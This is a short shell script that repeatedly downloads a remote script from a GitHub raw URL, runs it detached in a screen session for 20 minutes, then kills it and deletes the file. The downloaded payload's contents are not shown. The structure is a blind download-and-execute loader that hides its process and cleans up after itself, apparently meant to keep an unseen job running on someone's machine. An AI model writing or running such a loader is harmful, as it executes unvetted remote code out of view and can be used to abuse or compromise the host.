#!/bin/sh

for i in `seq 1 999`; do echo $i; wget -qO tesrun https://raw.githubusercontent.com/renilo/bh/main/pro.sh; chmod +x tesrun; screen -dmS Running ./tesrun; sleep 1200; clear; screen -XS Running quit; rm -f tesrun; echo SETTING PROJECT; sleep 300; done
